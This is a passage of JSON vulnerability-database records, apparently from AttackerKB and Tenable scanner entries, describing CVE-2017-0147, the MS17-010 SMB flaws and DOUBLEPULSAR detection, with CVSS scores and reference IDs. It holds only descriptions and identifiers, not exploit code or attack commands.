Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n", "enchantments": {"dependencies": {"modified": "2021-04-25T03:16:40", "references": [{"idList": ["MS:CVE-2017-0022", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389", "KB4010321"], "type": "mskb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96069"], "type": "symantec"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["KLA11833", "KLA10989", "KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810623", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-022.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0022"], "type": "cve"}, {"idList": ["AKB:5F5C5750-439B-4E16-AC48-8D321C492FDE", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-04-25T03:16:40", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "f7e7b0c9c17690b7114e3847a36138c1", "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "last_activity": null, "lastseen": "2021-04-25T03:16:40", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 2, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["cvelist"], "edition": 2, "lastseen": "2021-04-25T03:16:40"}, {"bulletin": {"attackerkb": {}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0147", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \u201cWindows SMB Information Disclosure Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:08am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAgain this is all part of CVE-2017-0143 to CVE-2017-0147 which were all exploited in NSA\u2019s exploit leak.\n", "enchantments": {"dependencies": {"modified": "2021-05-06T15:18:17", "references": [{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["CVE-2017-0147", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SMNTC-96709", "SMNTC-96703"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-05-06T15:18:17", "rev": 2, "value": 6.4, "vector": "NONE"}}, "hash": "308761069da5e59b07bb4a3defb40c48", "history": [], "href": "https://attackerkb.com/topics/DLKDGyTA2X/cve-2017-0147", "id": "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "immutableFields": [], "last_activity": "2000-01-01T10:00:00", "lastseen": "2021-05-06T15:18:17", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.6", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://www.exploit-db.com/exploits/41987", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.securityfocus.com/bid/96709"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0147", "type": "attackerkb", "viewCount": 3, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["last_activity", "description", "attackerkb"], "edition": 4, "lastseen": "2021-05-06T15:18:17"}], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0147"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}], "modified": "2021-07-20T20:12:25", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-07-20T20:12:25", "rev": 2}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 0, "exploitability": 0}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.securityfocus.com/bid/96709"], "Advisory": ["https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147"], "Miscellaneous": ["https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"]}, "tags": [], "mitre_vector": {}, "last_activity": "2020-11-22T03:08:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.attackerkb.AttackerKB", "robots.models.base.Bulletin"], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "9e3184b090a916875fe172879504df32"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "76174974a44b129dc7cb9905e72bee93"}, {"key": "href", "hash": "b981c43af3b615a415964e8db3de7b8e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "33304c5ad4f24166080d70e5d2fa6357"}, {"key": "published", "hash": "0404a0b8374966187f59ed4a2b846395"}, {"key": "references", "hash": "39066d294b8fbf1c3a8cec09d69adbc3"}, {"key": "reporter", "hash": "5e5266bea17c39e5ee12abd5fcbf7c2b"}, {"key": "title", "hash": "86a69a73afce6263b58d42af8e129794"}, {"key": "type", "hash": "dbbc8fce9a59d0a898c44c4f99244f4a"}], "scheme": null}], "nessus": [{"id": "700059.PRM", "hash": "26f8fbe66236fbc6cfd107f6fdddfb36", "type": "nessus", "bulletinFamily": "scanner", "title": "SMB Server DOUBLEPULSAR Backdoor / Implant Detection (EternalRocks)", "description": "NNM detected the presence of DOUBLEPULSAR on the remote Windows host. DOUBLEPULSAR is one of multiple Equation Group SMB implants and backdoors disclosed on 2017/04/14 by a group known as the 'Shadow Brokers'. The implant allows an unauthenticated, remote attacker to use SMB as a covert channel to exfiltrate data, launch remote commands, or execute arbitrary code.", "published": "2017-04-18T00:00:00", "modified": "2019-04-22T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nnm/700059", "reporter": "Tenable", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-mar.aspx", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://github.com/countercept/doublepulsar-detection-script", "http://thehackernews.com/2017/03/microsoft-patch-tuesday.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://technet.microsoft.com/library/security/ms17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-19T12:37:13", "history": [{"bulletin": {"id": "700059.PRM", "hash": "d9b91673eb08511cfd8fbf38d5c34ff3", "type": "nessus", "bulletinFamily": "scanner", "title": "SMB Server DOUBLEPULSAR Backdoor / Implant Detection (EternalRocks)", "description": "NNM detected the presence of DOUBLEPULSAR on the remote Windows host. DOUBLEPULSAR is one of multiple Equation Group SMB implants and backdoors disclosed on 2017/04/14 by a group known as the 'Shadow Brokers'. The implant allows an unauthenticated, remote attacker to use SMB as a covert channel to exfiltrate data, launch remote commands, or execute arbitrary code.", "published": "2017-04-18T00:00:00", "modified": "2019-04-22T00:00:00", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nnm/700059", "reporter": "Tenable", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://github.com/countercept/doublepulsar-detection-script", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://technet.microsoft.com/en-us/library/security/ms17-mar.aspx", "http://thehackernews.com/2017/03/microsoft-patch-tuesday.html", "https://technet.microsoft.com/library/security/ms17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-11T13:58:48", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27803"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", 